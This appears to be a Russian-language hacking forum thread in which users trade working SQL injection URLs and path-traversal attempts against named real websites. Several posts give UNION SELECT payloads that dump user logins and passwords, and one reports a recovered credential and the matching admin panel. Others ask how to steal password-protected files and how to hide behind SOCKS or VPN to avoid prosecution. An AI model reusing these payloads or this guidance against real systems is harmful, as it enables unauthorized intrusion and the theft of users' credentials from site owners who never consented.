Вполне согласен со Scipio. Возможно сначала идут 2 разных запроса, получают оба результата, и только после всего этого выводят в html. И если какойто запрос не выполняется то exit(mysql_error()); имхо Юзал недавно багу на 1 сайте, линк не помню, в общем посмотрел конфигурацию хостера - мускул 4 версии
есть такой запрос INSERT INTO `login` (`userid` , `user_pass` , `sex` , `email` , `state` ) VALUES ('user', '1234', 'M', '[email protected][sql query]', '0'); собсно, вопрос: можно ли как-нибудь приписать туда свой запрос? у меня получалось добавить только такой же insert [email protected]','0'),('asd','asd','M','[email protected]','0');/* но, хотелось бы чтонибудь более существенное, или инсерт, но с большим количеством столбцов. вроде так
Подскажите как можно решить вопрос с информацией по названию каталогов на сайте ????? Есть SQL inj: http://kojyhovo.ru/news/news.php?id=-81+union+select+1,concat(login,char(58),password)+from+users/* но не могу найти админку может кто подскажет. load_file('') не работает! Заранее спасибо.
Возможно ли тут раскрутить иньекцию? http://www.rochesterautodealers.com/news.asp?id=10'%201%20or%201=(select%20db_name())--
Это вобщето инъекция в MSAccess... теоретически раскрутить можно: Code: http://www.rochesterautodealers.com/news.asp?id=1%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20admins подбирай таблицы, прав на чтение системных таблиц нет З.Ы. вобще .Slip в чем то прав, но это так, мысли вслух ни к кому неотносящиеся
Вот мне интересно, что за дыра http://sait.ru/index.php?fuse=admin&view=.../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd В ответ вообще хз, что вылезло. An error has occurred with the given operation Fuse: admin Action: Type: User Error (256) Description: View .../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd does not exist Script: /var/www/saitdata/www/sait.ru/newedge/classes/NE_Controller.php Line Number: 88 Stack: /var/www/sait/data/www/sait.ru/newedge/classes/NE_Controller.php (88) : trigger_error /var/www/sait/data/www/sait.ru/newedge/front.php (72) : ne_controller:rocessview /var/www/sait/data/www/sait.ru/index.php (3) : require Попробовал по другому. http://sait.ru/index.php?fuse=.../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd Вышло следующее Module .../.../.../.../..../.../.../.../.../.../.../.../.../.../etc/passwd does not exist or hasn't been properly installed С таким никогда раньше не сталкивался.
Дай нормальную урлу - тебе скажут... Так возможный инклуд... Видно, что в скриптах используются свои обработчики ошибок... Что можно сделать - ХЗ. Урлу в студию.
- Существует ли способ скачать запороленный файл с ifolder.ru? Естественно, не зная пароля. Может есть какая-нибудь уязвимость? - Есть ли уязвимости в гостевой книге "SR + Denied Guestbook v.2.1.5"? В ранних версиях присутствовал баг с файлом passwd.dat, и XSS был, но в этой версии не пашет.
Code: http://www.f1links.com/list.php?id=62+UNION+SELECT+1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),1),1)/*
Code: http://www.f1links.com/list.php?id=-62+union+select+1,convert(count(*)+using+latin1)+from+users 4=\ Code: http://www.f1links.com/list.php?id=-62+union+select+1,convert(concat(user,0x3a,pass)+using+latin1)+from+users+limit+0,1 david:bla = http://www.f1links.com/admin/ Have fun
Только что нашел sql инъекцию, через которую можно слить мыла и пароли юзеров сайта, это уголовно наказуемо?) И как от этого уберечься? Соксы и VPN ?
Не можно, а нужно =)... Если ваша уязвимость на сайте понравится участникам форума, то вам за это даже репутацию повысят...
Есть сайт вида Code: http://www.site.ru/11/15/ При подстановке одинарной кавычки Code: http://www.site.ru/11/15'/ Плюет : Code: Ошибка Внутренняя ошибка SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '') AND `id` IN (SELECT `nid` FROM `node__access` WHERE `r` = 1 AND `uid` IN (408' at line 1 И отсюда у меня 2 вопроса: это инъект ? если да, то какого вида должен быть запрос?
